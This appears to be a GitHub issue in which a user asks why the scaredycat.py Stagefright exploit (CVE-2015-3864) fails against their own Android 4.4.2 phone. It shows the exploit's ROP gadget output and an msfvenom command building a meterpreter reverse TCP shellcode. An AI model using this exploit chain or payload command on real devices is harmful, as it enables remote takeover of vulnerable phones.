You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I'm trying to get a reverse shell on my smartphone Docomo Fujitsu Arrows NX F-01F [ Android 4.4.2, build # V10R22A (kernel version 3.4.0), ARMv7 arch (armv7l, armeabi-v7a) ]. Stagefright Detector shows that this device is vulnerable to CVE-2015-3864. So I set up the environment to run scaredycat.py on Ubuntu 15.04. Also I've pulled out libc.so from the phone and generated new shellcode.bin with my IP/port params.
This is how it starts:
ubuntu@ubuntu-VirtualBox:~/scaredycat-master$ python scaredycat.py
**************************************************
*** SCAREDYCAT! version 0.1 beta ***
author: vvn <root@nobody.ninja>
release date: December 8, 2015
please support my work by buying a copy of my EP!
http://dreamcorp.us
http://facebook.com/dreamcorporation
**************************************************
** ON LOCAL NETWORK, URL IS: http://192.168.0.4:8080 **
[*] memcpy : 0xb6edf221
[*] mmap64 : 0xb6ecfeb5
b6edf09c: e280204c add r2, r0, #76 ; 0x4c
b6edf0a0: e8927ff0 ldm r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6edf0a4: e33d0000 teq sp, #0
b6edf0a8: 133e0000 teqne lr, #0
[*] stack_pivot : 0xb6edf09c
b6ecc29e: bd00 pop {pc}
[*] pop_pc : 0xb6ecc29f
b6ed144c: bd0f pop {r0, r1, r2, r3, pc}
[*] pop_r0_r1_r2_r3_pc : 0xb6ed144d
b6ecf6d6: bdf0 pop {r4, r5, r6, r7, pc}
[*] pop_r4_r5_r6_r7_pc : 0xb6ecf6d7
b6ef9bb8: e59de040 ldr lr, [sp, #64] ; 0x40
b6ef9bbc: e28dd048 add sp, sp, #72 ; 0x48
b6ef9bc0: e12fff1e bx lr
[16/Jun/2017:09:12:18] ENGINE Listening for SIGHUP.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGTERM.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGUSR1.
[16/Jun/2017:09:12:18] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread 'Autoreloader'.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread '_TimeoutMonitor'.
[16/Jun/2017:09:12:18] ENGINE Serving on http://0.0.0.0:8080
[16/Jun/2017:09:12:18] ENGINE Bus STARTED
On the phone I can load that html with mp4 when I go to http://192.168.0.4:8080. When the browser loads the page I see the client's queries to the server:
And so forth (the server reloads the page and nothing happens moreover). Well, I tried different browsers (default one and Firefox), different IPs, ports etc. That all doesn't help. How could I check if this CVE works on my device or the shellcode is wrong or ... ?
I create shellcode with this command: msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
I assume it should be linux payload, not android one. Right?
Now I don't know what to do with this exploit so I'm gonna test other tools, e.g. Metaphor. Those might be more successful than this one, but they are more complicated.
The text was updated successfully, but these errors were encountered:
I'm trying to get a reverse shell on my smartphone Docomo Fujitsu Arrows NX F-01F [ Android 4.4.2, build # V10R22A (kernel version 3.4.0), ARMv7 arch (armv7l, armeabi-v7a) ]. Stagefright Detector shows that this device is vulnerable to CVE-2015-3864. So I set up the environment to run scaredycat.py on Ubuntu 15.04. Also I've pulled out libc.so from the phone and generated new shellcode.bin with my IP/port params.
This is how it starts:
On the phone I can load that html with mp4 when I go to http://192.168.0.4:8080. When the browser loads the page I see the client's queries to the server:
And so forth (the server reloads the page and nothing happens moreover). Well, I tried different browsers (default one and Firefox), different IPs, ports etc. That all doesn't help. How could I check if this CVE works on my device or the shellcode is wrong or ... ?
I create shellcode with this command:
msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
I assume it should be linux payload, not android one. Right?
Now I don't know what to do with this exploit so I'm gonna test other tools, e.g. Metaphor. Those might be more successful than this one, but they are more complicated.
The text was updated successfully, but these errors were encountered: